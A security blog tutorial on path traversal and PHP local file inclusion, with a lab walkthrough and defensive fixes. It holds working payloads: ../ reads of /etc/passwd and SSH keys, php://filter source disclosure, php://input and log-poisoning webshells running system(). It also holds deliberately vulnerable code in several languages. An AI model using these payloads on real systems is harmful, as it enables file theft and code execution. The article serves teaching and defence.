Path traversal is the second-oldest serious web vulnerability after SQL injection, catalogued as CWE-22 and parked inside the A01 Broken Access Control bucket of the OWASP Top 10. The basic shape, sticking ../ into a ?file= parameter to read /etc/passwd, looks dated enough that every junior pentester learns it on day one and assumes the class is solved. It is not. In PHP land, traversal is the front door to a chain that reads source, then writes source, then runs code, all from a single GET parameter and a forgiving php.ini.
This article is the deep-dive companion to the web application security vulnerabilities taxonomy and a sibling to the SQL injection spoke. I cover the mechanism, the four exploit shapes that actually matter in 2026, a fully working walkthrough against a Dockerised lab, the variants in non-PHP stacks, and the defences that hold up. Tool-level material lives in best LFI tools 2026.
What is path traversal?
Path traversal is a vulnerability in which user-supplied input is concatenated into a filesystem path that the application then opens, allowing the user to step outside the intended directory using relative-path segments like ../ and read files the developer never meant to expose. The most common payload, ../../../../etc/passwd, escapes a docroot or templates directory and lands on the Unix password file.
Three terms get used interchangeably and they are not the same:
- Path traversal (CWE-22). The generic class. Any time user input controls a filesystem path and ../ can escape the intended root.
- Local File Inclusion (LFI). A PHP-flavoured subclass where the path is passed to include, require, include_once, or require_once. The file is not just read, it is interpreted as PHP. If the attacker can get PHP source onto the box (log poisoning, upload, wrapper), LFI turns into code execution.
- Remote File Inclusion (RFI). The same sink, but the include path is a URL. Effectively extinct in modern PHP because allow_url_include defaults to Off, but it lives on in legacy configs and in CTF challenges.
OWASP places traversal under A01 Broken Access Control rather than as its own item, which understates how often I find it during code review. Verify against the OWASP Top 10 2021 listing yourself; the 2024 refresh is still in draft at the time of writing.
The canonical vulnerable PHP, two lines:
$page = $_GET['page'];
include($page);
Hit it with ?page=pages/about.php and the application works as intended. Hit it with ?page=../../../../etc/passwd and the application reads /etc/passwd. There is no third interpretation; the parser is doing exactly what was written.
The four exploit shapes
Every traversal exploit I have used on a real engagement falls into one of four shapes. Three of them are PHP-specific and feed the chain towards RCE. The remaining one, classic ../ traversal, is the cross-stack baseline.
Classic ../ traversal
The original shape. The application reads the file and serves the bytes. Useful for reading config, credentials, source (if the file is served raw rather than interpreted), application metadata, SSH keys if you are lucky and the web user has access.
GET /download?file=../../../../etc/passwd
GET /view?template=../../../../var/www/app/.env
GET /image?path=../../../../home/deploy/.ssh/id_rsa
The number of ../ segments is "as many as needed". A request that goes too high just lands at / and the filesystem ignores the surplus, so ../../../../../../../../etc/passwd works as well as the exact count. Lazy traversal payloads always over-shoot for that reason.
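The over-shoot behaviour can be checked without touching a real target. The following is a minimal Python sketch that models the path walk lexically with posixpath.normpath; it ignores symlinks, and the base directory is a hypothetical example rather than anything taken from a real application.

```python
import posixpath


def resolve_lexically(base_dir: str, user_path: str) -> str:
    """Join and normalise a path the way a POSIX path walk would, ignoring symlinks."""
    return posixpath.normpath(posixpath.join(base_dir, user_path))


base = "/var/www/app/templates"          # hypothetical base directory (4 levels deep)
exact = "../" * 4 + "etc/passwd"         # exactly enough segments to reach /
overshoot = "../" * 12 + "etc/passwd"    # far more segments than needed
undershoot = "../" * 2 + "etc/passwd"    # too few segments, stays under /var/www

print(resolve_lexically(base, exact))       # /etc/passwd
print(resolve_lexically(base, overshoot))   # /etc/passwd
print(resolve_lexically(base, undershoot))  # /var/www/etc/passwd
```

Surplus segments are absorbed at the root, so only the under-shoot misses. That asymmetry is the whole reason payload lists over-shoot.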
php://filter source disclosure
PHP ships a set of stream wrappers for include and the filesystem functions, and the php://filter wrapper accepts a chain of filters applied to the underlying file before it is read. The interesting filter is convert.base64-encode:
GET /view.php?page=php://filter/convert.base64-encode/resource=index
include() is handed a stream that base64-encodes the file index.php as it reads. Because the encoded bytes contain no <?php opening tag, the engine has nothing to parse as code; it echoes them as plain text, and the response contains a base64 blob. Decode it locally and you have the verbatim source. Repeat against every script you can guess (view, login, db, config, wp-config) and you walk away with the application source plus every credential hard-coded in it.
This shape works against sinks that the classic shape cannot defeat. The most common one is include($_GET['page'] . '.php'), where the appended .php blocks a literal /etc/passwd read but is happily consumed by the wrapper as part of the resource= argument.
php://input RCE
The php://input wrapper exposes the raw request body as a stream. include('php://input') reads the POST body and parses it as PHP. With allow_url_include=On in php.ini, an unauthenticated attacker gets code execution from one GET parameter plus one POST body.
POST /view-raw.php?page=php://input
Body: <?php system($_GET[0]); ?>
The default value of allow_url_include is Off, and PHP has shipped that default since 5.2 (see the PHP runtime configuration reference). Production servers that have not been hand-tampered with are safe from this specific shape by default. The shape still appears in the wild because operators flip the setting on while debugging a legitimate use case, never flip it back, and leave the server in that state for years.
Log poisoning
Log poisoning is the fallback when allow_url_include is Off, php://input does not work, and you still want RCE. The idea is to write PHP source onto disk via a path the attacker controls, then include that file with a classic traversal.
The two reliable write surfaces are the Apache or nginx access log and the error log. The access log records the User-Agent header as the client sent it, so send a request with a PHP tag as the user agent:
curl -A '<?php system($_GET[0]); ?>' http://target/
The access log now contains a real <?php block. Read it back with a traversal:
GET /view-raw.php?page=../../../../var/log/apache2/access.log&0=id
include() reaches the PHP tag inside the log file, parses it, and runs the system($_GET[0]) call with the attacker's chosen command. Variants of the same trick work against /var/log/apache2/error.log (poisoned via a 404 request whose URL contains PHP), /proc/self/environ on older kernels, the $HOME/.ssh/authorized_keys file when the web user happens to be the SSH user, and any session file the application writes to a known directory.
Log poisoning fails by default on modern Debian and Ubuntu because Apache writes access logs as 0640 root:adm and the www-data user is not in the adm group. Every "let the deploy user tail the logs from the debug dashboard" change to that ACL re-opens the chain. I have seen this exact misconfiguration in three different production environments in 2024 alone.
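Whether the chain works comes down to one permission check. The sketch below models the classic Unix owner/group/other read test in Python. It is a simplification that ignores root, ACLs and capabilities, and the numeric IDs are illustrative values chosen for the example, not read from any real system.

```python
import stat

# Illustrative numeric IDs (assumptions for this example only).
ROOT_UID = 0
ADM_GID = 4
WWW_DATA_UID = 33
WWW_DATA_GID = 33


def can_read(mode: int, owner_uid: int, owner_gid: int, uid: int, gids: set) -> bool:
    """Classic owner/group/other read check; ignores root, ACLs and capabilities."""
    if uid == owner_uid:
        return bool(mode & stat.S_IRUSR)
    if owner_gid in gids:
        return bool(mode & stat.S_IRGRP)
    return bool(mode & stat.S_IROTH)


log_mode = 0o640  # access log written as 0640 root:adm

# Default case: the web user is not in adm, so include() cannot read the log.
default_ok = can_read(log_mode, ROOT_UID, ADM_GID, WWW_DATA_UID, {WWW_DATA_GID})

# Misconfigured case: the web user was added to adm "to tail the logs".
misconfigured_ok = can_read(log_mode, ROOT_UID, ADM_GID, WWW_DATA_UID, {WWW_DATA_GID, ADM_GID})

print(default_ok, misconfigured_ok)  # False True
```

One group membership flips the result, which is why a convenience change to log access deserves the same review as a change to the include sink itself.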
Why null bytes don't work anymore
Pre-2010 LFI tutorials lean heavily on the null-byte truncation trick: append %00 to the payload so that the C-level string ends before the appended .php suffix, turning include($_GET['page'] . '.php') into a working classic traversal. That trick was killed by PHP 5.3.4, released on December 9, 2010, which added null-byte rejection in the core filename APIs (further extensions to the check across exec, system, move_uploaded_file, and related functions landed across the 5.6.x series in 2015). Any path containing a \0 byte now raises an error rather than being silently truncated.
Verify against the PHP 5.3.4 changelog yourself before relying on the date in your own writing.
The wrapper-based shapes in this article exist because the wrappers became the modern equivalent of the null byte. php://filter defeats the same suffix-append sink that %00 used to defeat, and it has no equivalent fix in the language because the wrapper is a legitimate feature.
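The difference between silent truncation and outright rejection is easy to model. The Python sketch below is a toy model of the two behaviours described in this section, not PHP's actual implementation; both function names are hypothetical.

```python
def legacy_c_string(path: str) -> str:
    """Model of the old behaviour: the C layer stops reading at the first NUL byte."""
    return path.split("\0", 1)[0]


def modern_check(path: str) -> str:
    """Model of the fixed behaviour: a path containing NUL is rejected, not truncated."""
    if "\0" in path:
        raise ValueError("path contains a null byte")
    return path


payload = "../../../../etc/passwd\0"   # what ?page=../../../../etc/passwd%00 decodes to
built = payload + ".php"               # what the suffix-append sink constructs

print(repr(legacy_c_string(built)))    # '../../../../etc/passwd'

try:
    modern_check(built)
except ValueError as exc:
    print("rejected:", exc)
```

In the legacy model the suffix is still appended, it is simply never seen by the code that opens the file.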
Walk a working chain (lab)
For everything below, I am attacking the lfi-basic target from the techearl-labs companion repo. It is a small PHP 8.2 app with two intentionally-vulnerable include sinks side by side, deliberately configured with allow_url_include=On and display_errors=On. Boot it with:
docker compose up lfi-basic
The lab listens on http://localhost:8084. The two endpoints differ in one detail that drives every exploit decision below:
| Endpoint | Sink shape |
|---|---|
| /view.php?page=pages/about | include($_GET['page'] . '.php'), .php is appended |
| /view-raw.php?page=pages/about.php | include($_GET['page']), raw, no suffix |
1. Classic traversal against the raw sink
view-raw.php passes the parameter straight through. Plain ../ works:
curl 'http://localhost:8084/view-raw.php?page=../../../../etc/passwd'
The response renders /etc/passwd inline inside the page panel. Files with no <?php opening tag are echoed by include(), which is why the password file comes back as plain text rather than being parsed.
The same payload against /view.php fails. The engine looks for /etc/passwd.php, finds nothing, and the warning surfaces in the response (because display_errors=On). The suffix is doing its only useful job.
2. php://filter source disclosure against the suffix sink
view.php appends .php, so the wrapper has to compose with the suffix:
curl 'http://localhost:8084/view.php?page=php://filter/convert.base64-encode/resource=pages/about'
The wrapper opens pages/about.php (the appended .php rides along inside the resource= argument), pipes it through the base64 encoder, and the include echoes the encoded source. Pipe through base64 -d to recover the original:
curl -s 'http://localhost:8084/view.php?page=php://filter/convert.base64-encode/resource=pages/about' \
  | grep -oE '[A-Za-z0-9+/=]{40,}' | base64 -d
Repeat for resource=view, resource=view-raw, resource=shared/layout to pull every PHP source file the application ships. Source disclosure is the highest-value LFI outcome short of code execution because it hands you every other endpoint's sink shape and every hard-coded credential in one pass.
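When pulling many files, the grep and base64 -d pipeline is easier to script. Here is a minimal Python sketch of the same extraction step. It assumes the response embeds a single base64 run of at least 40 characters inside surrounding HTML; the sample source and page wrapper are invented for the demonstration and are not taken from the lab.

```python
import base64
import re


def extract_source(response_body: str, min_len: int = 40) -> str:
    """Find the first long base64 run in a response body and decode it."""
    pattern = r"[A-Za-z0-9+/]{%d,}={0,2}" % min_len
    match = re.search(pattern, response_body)
    if match is None:
        raise ValueError("no base64 run found in response")
    return base64.b64decode(match.group(0)).decode("utf-8", errors="replace")


# Synthetic stand-in for what the vulnerable page would return.
sample_source = '<?php $db_password = "hunter2"; echo "About us"; ?>'
encoded = base64.b64encode(sample_source.encode()).decode()
demo_response = '<div class="panel">' + encoded + "</div>"

print(extract_source(demo_response))
```

The length threshold plays the same role as {40,} in the grep pattern: it skips short alphanumeric runs in the surrounding markup.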
3. php://input RCE against the raw sink
The wrapper only matches the literal path php://input, so the attack runs against view-raw.php (no suffix). Against view.php, the appended .php produces php://input.php, which the wrapper does not recognise.
curl -X POST --data '<?php echo shell_exec("id"); ?>' \
  'http://localhost:8084/view-raw.php?page=php://input'
The response carries the output of id, something like uid=33(www-data) gid=33(www-data) .... Any PHP runs, not just shell_exec: file writes, reverse shells, persistent webshells dropped into the docroot, database egress, anything the www-data process can do inside the container.
4. Log poisoning against the raw sink
The chain has two steps. Inject a PHP tag into the access log via the User-Agent of any request:
curl -A '<?php system($_GET[0]); ?>' http://localhost:8084/
Include the log via traversal, passing the command in ?0=:
curl 'http://localhost:8084/view-raw.php?page=../../../../var/log/apache2/access.log&0=id'
The log contains thousands of bytes of unrelated request lines, but the moment the parser sees <?php system($_GET[0]); ?> it switches into PHP mode, runs the call, switches back to literal-output mode, and the response carries the command output along with the rest of the log.
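The mode switching is what makes a mostly-text log file dangerous to include. The Python sketch below is a toy model of that behaviour: it splits text into literal and PHP segments with a regular expression. It is not the PHP lexer, and the log line is a made-up example in the common combined format.

```python
import re

PHP_BLOCK = re.compile(r"<\?php(.*?)\?>", re.DOTALL)


def split_modes(text: str) -> list:
    """Return (mode, chunk) pairs: 'literal' chunks are echoed, 'php' chunks are executed."""
    parts = []
    pos = 0
    for m in PHP_BLOCK.finditer(text):
        if m.start() > pos:
            parts.append(("literal", text[pos:m.start()]))
        parts.append(("php", m.group(1).strip()))
        pos = m.end()
    if pos < len(text):
        parts.append(("literal", text[pos:]))
    return parts


# Invented access-log line carrying the poisoned User-Agent.
log_line = (
    '127.0.0.1 - - [01/Jan/2026:00:00:00 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"<?php system($_GET[0]); ?>"\n'
)

for mode, chunk in split_modes(log_line):
    print(mode, repr(chunk))
```

Everything outside the tag is plain output, so the surrounding log noise does no harm to the attacker. It only pads the response.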
The lab's Dockerfile deliberately adds www-data to the adm group so the 0640 root:adm access log is readable by PHP. Without that change the chain fails with permission-denied; with it, it succeeds. The misconfiguration mirrors what real "let the web app tail its own logs" deployments do.
Beyond PHP: traversal in other stacks
The PHP-specific shapes (php://filter, php://input, log-poisoning-via-include) do not port to other stacks because no other runtime evaluates included files as code. The classic traversal shape does. Every framework that constructs a path from user input is potentially vulnerable.
Node.js
The footgun is path.join and friends. path.join happily resolves .. segments and lets you escape the base directory:
app.get('/files/:name', (req, res) => {
  const file = path.join('/var/www/uploads', req.params.name);
  res.sendFile(file);
});
GET /files/..%2F..%2F..%2Fetc%2Fpasswd resolves to /etc/passwd. The fix is path.resolve plus a prefix check, not path.join:
const base = path.resolve('/var/www/uploads');
const target = path.resolve(base, req.params.name);
if (!target.startsWith(base + path.sep)) return res.sendStatus(403);
res.sendFile(target);
Express's static middleware blocks .. segments by default, but custom send handlers and any direct fs.readFile call with user input are at risk.
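The encoded payload only becomes dangerous once the framework has percent-decoded the route parameter. As a language-neutral illustration, this Python sketch reproduces the decode-then-join sequence with urllib.parse.unquote and posixpath. It models the behaviour and is not Express's own code; the function name is hypothetical.

```python
import posixpath
from urllib.parse import unquote


def joined_path(base: str, raw_param: str) -> str:
    """Percent-decode a route parameter, then join and normalise it against base."""
    decoded = unquote(raw_param)
    return posixpath.normpath(posixpath.join(base, decoded))


base = "/var/www/uploads"

print(unquote("..%2F..%2F..%2Fetc%2Fpasswd"))            # ../../../etc/passwd
print(joined_path(base, "..%2F..%2F..%2Fetc%2Fpasswd"))  # /etc/passwd
print(joined_path(base, "report.pdf"))                   # /var/www/uploads/report.pdf
```

Filtering for a literal ../ before decoding misses this payload entirely, so the containment check has to run on the final resolved path.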
Java
The classic Java instance is the "zip slip" vulnerability disclosed by Snyk in 2018, where archive entries with ../ in the name escape the extraction directory:
File target = new File(destDir, entry.getName());
new FileOutputStream(target).write(...);
A malicious archive entry named ../../../../etc/cron.d/pwn lands wherever the running user has write access. Fix:
File destRoot = destDir.getCanonicalFile();
File target = new File(destRoot, entry.getName()).getCanonicalFile();
if (!target.toPath().startsWith(destRoot.toPath())) {
    throw new IOException("zip slip: " + entry.getName());
}
getCanonicalFile() resolves .. segments and symlinks before the prefix check; getAbsoluteFile() does not, which is why the lazy fix loses. Canonicalise the destination directory as well, so that both sides of the comparison are in the same form.
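The same check can be run over an archive before anything is extracted. The Python sketch below builds a small in-memory zip containing one benign and one hostile entry, then lists the names that would resolve outside the destination. The check is lexical only (no symlink resolution), and the destination path and entry names are invented for the example.

```python
import io
import posixpath
import zipfile


def unsafe_entries(archive_bytes: bytes, dest_dir: str) -> list:
    """List entry names that would resolve outside dest_dir (lexical check only)."""
    dest = posixpath.normpath(dest_dir)
    bad = []
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as zf:
        for name in zf.namelist():
            target = posixpath.normpath(posixpath.join(dest, name))
            # The trailing separator stops /opt/app/extract-evil from passing the check.
            if not target.startswith(dest + "/"):
                bad.append(name)
    return bad


def build_demo_archive() -> bytes:
    """Create an in-memory zip with one normal entry and one traversal entry."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("docs/readme.txt", "hello")
        zf.writestr("../../../../etc/cron.d/pwn", "* * * * * root id")
    return buf.getvalue()


print(unsafe_entries(build_demo_archive(), "/opt/app/extract"))
```

Rejecting the whole archive when this list is non-empty is usually simpler to reason about than skipping individual entries.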
.NET
Path.Combine is the equivalent of Node's path.join and has the same defect, except worse: if the second argument is an absolute path, Path.Combine discards the first argument entirely and returns the second. Path.Combine("/var/www/uploads", "/etc/passwd") returns /etc/passwd. The defence is Path.GetFullPath plus a prefix check, identical in shape to the Node.js pattern. Modern guidance on Microsoft Learn pushes Path.GetFullPath with an explicit base, which validates inputs as it resolves.
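The discard-the-base behaviour is not unique to .NET. Python's path join does the same thing, which makes it a convenient way to see the effect. This sketch shows Python's posixpath.join as an analogue, not .NET itself.

```python
import posixpath

base = "/var/www/uploads"

relative = posixpath.join(base, "report.pdf")
absolute = posixpath.join(base, "/etc/passwd")   # the base is silently discarded

print(relative)   # /var/www/uploads/report.pdf
print(absolute)   # /etc/passwd


def reject_absolute(user_path: str) -> bool:
    """Cheap early rejection; it complements the resolve-and-prefix check, it does not replace it."""
    return posixpath.isabs(user_path)


print(reject_absolute("/etc/passwd"))   # True
print(reject_absolute("report.pdf"))    # False
```

An attacker facing this kind of join needs no ../ segments at all, so a filter that only looks for dot-dot sequences gives no protection.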
The class is the same across every stack. The interpreter changes, the syntax changes, the trust failure does not.
Modern defences
Resolve and prefix-check
The single most important defence is to resolve the requested path to its canonical form and then check it is inside the allowed directory. In PHP that is realpath:
$base = realpath(__DIR__ . '/pages');
$target = realpath($base . '/' . $_GET['page']);
if ($target === false || !str_starts_with($target, $base . DIRECTORY_SEPARATOR)) {
    http_response_code(403);
    exit('Forbidden');
}
include($target);
realpath returns false for paths that do not exist, which closes the "file does not exist yet but the parent directory check passed" race window. The str_starts_with prefix check with the trailing separator stops the /srv/pages-evil/ versus /srv/pages/ confusion, where the legitimate base is a prefix of an attacker-controlled sibling directory.
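The sibling-directory confusion is easy to reproduce with plain strings. This Python sketch compares a prefix check without the trailing separator, one with it, and a component-wise comparison using posixpath.commonpath. The paths are hypothetical and assumed to be already canonical.

```python
import posixpath

base = "/srv/pages"
good = "/srv/pages/about.php"
evil = "/srv/pages-evil/shell.php"   # sibling directory that shares the string prefix


def loose_check(target: str, base_dir: str) -> bool:
    """Broken: plain string prefix, no separator."""
    return target.startswith(base_dir)


def strict_check(target: str, base_dir: str) -> bool:
    """Prefix check with the trailing separator appended to the base."""
    return target.startswith(base_dir + "/")


def component_check(target: str, base_dir: str) -> bool:
    """Alternative: compare whole path components instead of characters."""
    return posixpath.commonpath([base_dir, target]) == base_dir


for check in (loose_check, strict_check, component_check):
    print(check.__name__, check(good, base), check(evil, base))
```

Only the loose check accepts the sibling path. The other two agree with each other, and the component-wise form has the small advantage that the separator cannot be forgotten.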
Allow-list of known IDs
Better: do not let user input become a path at all. Map an opaque ID to a known file:
$pages = [
    'about' => '/srv/app/pages/about.php',
    'contact' => '/srv/app/pages/contact.php',
];
$key = $_GET['page'] ?? 'about';
if (!isset($pages[$key])) { http_response_code(404); exit; }
include($pages[$key]);
This is the only design that is correct by construction. The user controls a key into a map, not a filesystem path. Adding a page is one line in the array, which is cheap enough that I reach for this pattern by default.
Disable dangerous PHP directives
allow_url_include = Off
allow_url_fopen = Off
open_basedir = /srv/app:/tmp
display_errors = Off
log_errors = On
allow_url_include=Off kills the php://input RCE chain outright. allow_url_fopen=Off removes the network-fetch shapes. open_basedir confines filesystem access to an allow-listed set of directories, blocking the traversal even if the application sink is broken. None of these defences cover php://filter against the local docroot, which is why they are layered with the prefix check, not a replacement for it.
Separate file-serving service
For applications that genuinely serve user-uploaded files, the strongest pattern is a separate microservice (or a CDN with signed URLs) that holds nothing but the upload bucket and serves files by content-addressed identifier. The application hands the user a signed URL pointing at the service; the service has no relationship to the application's filesystem and no traversal sink. This is the pattern most mature SaaS platforms use for user uploads at scale.
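A signed URL of this kind can be as simple as an HMAC over the file identifier and an expiry time. The Python sketch below shows one possible shape under stated assumptions: identifiers are SHA-256 hex digests, the secret is a hard-coded placeholder, and the message format is invented for the example. It does not describe any particular CDN's scheme.

```python
import hashlib
import hmac
import re
import time

SECRET = b"demo-secret-change-me"        # placeholder; a real service would load this securely
FILE_ID = re.compile(r"^[0-9a-f]{64}$")  # content-addressed ID: a SHA-256 hex digest


def sign(file_id: str, expires: int, secret: bytes = SECRET) -> str:
    """Return a hex HMAC-SHA256 over the file ID and expiry timestamp."""
    msg = f"{file_id}:{expires}".encode()
    return hmac.new(secret, msg, hashlib.sha256).hexdigest()


def verify(file_id: str, expires: int, signature: str, now=None, secret: bytes = SECRET) -> bool:
    """Accept only well-formed IDs with an unexpired, matching signature."""
    if not FILE_ID.match(file_id):
        return False                     # nothing path-like ever reaches storage
    current = int(time.time()) if now is None else now
    if current > expires:
        return False
    expected = sign(file_id, expires, secret)
    return hmac.compare_digest(expected, signature)


file_id = hashlib.sha256(b"example upload").hexdigest()
sig = sign(file_id, expires=2000)
print(verify(file_id, 2000, sig, now=1000))   # True
print(verify(file_id, 2000, sig, now=3000))   # False
```

Because the identifier format admits only hex characters, there is no string the user can supply that contains a separator or a dot, which removes the traversal sink rather than guarding it.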
Chroot and container isolation
Running the web process inside a chroot or a container with a minimal filesystem means a successful traversal lands the attacker inside a sandbox with nothing valuable in it. A read of /etc/passwd returns the container's stub /etc/passwd, not the host's. Combine with read-only root, no shell binaries, and dropped capabilities (CAP_DAC_READ_SEARCH in particular) and even a chained RCE has very little to do.
Real-world incidents (CVE section)
Path traversal hits well-maintained software regularly. A representative sample, all verified against the public CVE record:
- CVE-2021-41773, Apache HTTP Server 2.4.49. Path traversal in URL handling, allowing requests to reach files outside the document root if directories were configured with Require all granted. Disclosed and patched in October 2021. The fix in 2.4.50 was incomplete, leading to CVE-2021-42013 a week later that also extended the impact to RCE when mod_cgi was enabled.
- CVE-2021-42013, Apache HTTP Server 2.4.49 and 2.4.50. The follow-up to 41773, exploitable via double-encoding of the traversal sequence. The Apache Software Foundation rated it Critical for the RCE variant.
- CVE-2024-23897, Jenkins. Arbitrary file read via the built-in CLI command parser, which expanded @filename arguments. Disclosed January 2024. Without Overall/Read permission, attackers could read the first three lines of any file readable by the Jenkins controller; with Overall/Read, the full file contents. Real exploitation chained the file-read into SSH key disclosure and lateral movement.
- CVE-2023-2825, GitLab CE/EE. Path traversal in the file upload handler, allowing an unauthenticated user to read arbitrary files from the GitLab server when an attachment was in a public project nested deep enough. Disclosed May 2023 (NVD published 2023-05-26), affecting GitLab CE/EE 16.0.0 only; GitLab released 16.0.1 shortly after.
- CVE-2019-19781, Citrix ADC and Gateway. Path traversal in the Citrix VPN appliance reaching a Perl template that the attacker could write to, chaining traversal into unauthenticated RCE. The 2019 disclosure landed without a patch for ten days and was mass-exploited.
Every one of these landed in software with security teams, code review, and bug-bounty programs. Path traversal is not a museum piece.
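The double-encoding bypass mentioned for CVE-2021-42013 rests on a general mismatch: a filter that decodes once, followed by a consumer that decodes again. The Python sketch below illustrates that mismatch with a standard double-encoded sequence. It is a generic illustration, not the actual Apache payload or code path, and the filter function is hypothetical.

```python
from urllib.parse import unquote

payload = "%252e%252e%252f"   # "../" percent-encoded twice

once = unquote(payload)       # what a single-decode filter inspects
twice = unquote(once)         # what a second decode downstream produces

print(once)    # %2e%2e%2f
print(twice)   # ../


def naive_filter_blocks(raw: str) -> bool:
    """Hypothetical filter: decode once, then look for a literal traversal sequence."""
    return "../" in unquote(raw)


print(naive_filter_blocks("..%2f"))    # True, the single-encoded form is caught
print(naive_filter_blocks(payload))    # False, the double-encoded form slips through
```

The durable fix is the one used throughout this article: decode fully, resolve to a canonical path, and only then apply the containment check.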
Where to go next
- The best LFI tools for 2026 listicle for the practical tool comparison.
- The SQL injection deep dive for the sibling spoke in the same security cluster.
- The web application security vulnerabilities taxonomy for the full map.
Path traversal is the cheapest serious vulnerability to introduce (two lines of PHP, one line of Node) and one of the cheaper ones to fix (one resolve plus one prefix check). The reason it survives is not that the fix is hard, it is that the sinks are scattered across the codebase and every "let the user pick a file" feature is a fresh chance to get it wrong. Treat every filesystem path that touches user input as untrusted, every time.
Sources
Authoritative references this article was fact-checked against.
- OWASP, Path Traversal (owasp.org)
- PHP, Supported protocols and wrappers (php.net)
- PortSwigger, Directory traversal (portswigger.net)
- CWE-22: Improper Limitation of a Pathname to a Restricted Directory (cwe.mitre.org)
- PHP, allow_url_include directive (php.net)





